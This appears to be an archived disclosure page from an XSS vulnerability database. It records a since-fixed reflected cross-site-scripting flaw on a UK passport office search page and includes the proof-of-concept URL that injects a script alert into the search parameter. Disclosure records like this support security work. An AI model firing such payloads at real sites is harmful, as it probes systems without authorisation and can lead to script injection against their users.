Advertisements:
Security researcher Error_Code, has submitted on 23/11/2008 a cross-site-scripting (XSS) vulnerability affecting www.ips.gov.uk, which at the time of submission ranked 58037 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/01/2009. It is currently fixed.
Date submitted: 23/11/2008 Date published: 07/01/2009 Date fixed: 01/05/2010Status:  FIXED
Author: Error_Code Domain: www.ips.gov.uk Category: XSS Pagerank: 58037
URL: http://www.ips.gov.uk/passport/search/search.asp?strsearch=%3Cscript%3Ealert(%22Error%20Code%20{D0L4
}%22)%3C/script%3E;
Click here to view the mirror
Buy XSS Attacks book from Amazon!
XSS Attacks
Cross Site Scripting Exploits and Defense
Buy Detecting Malice book from RSnake
Website Fraud Loss Prevention
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.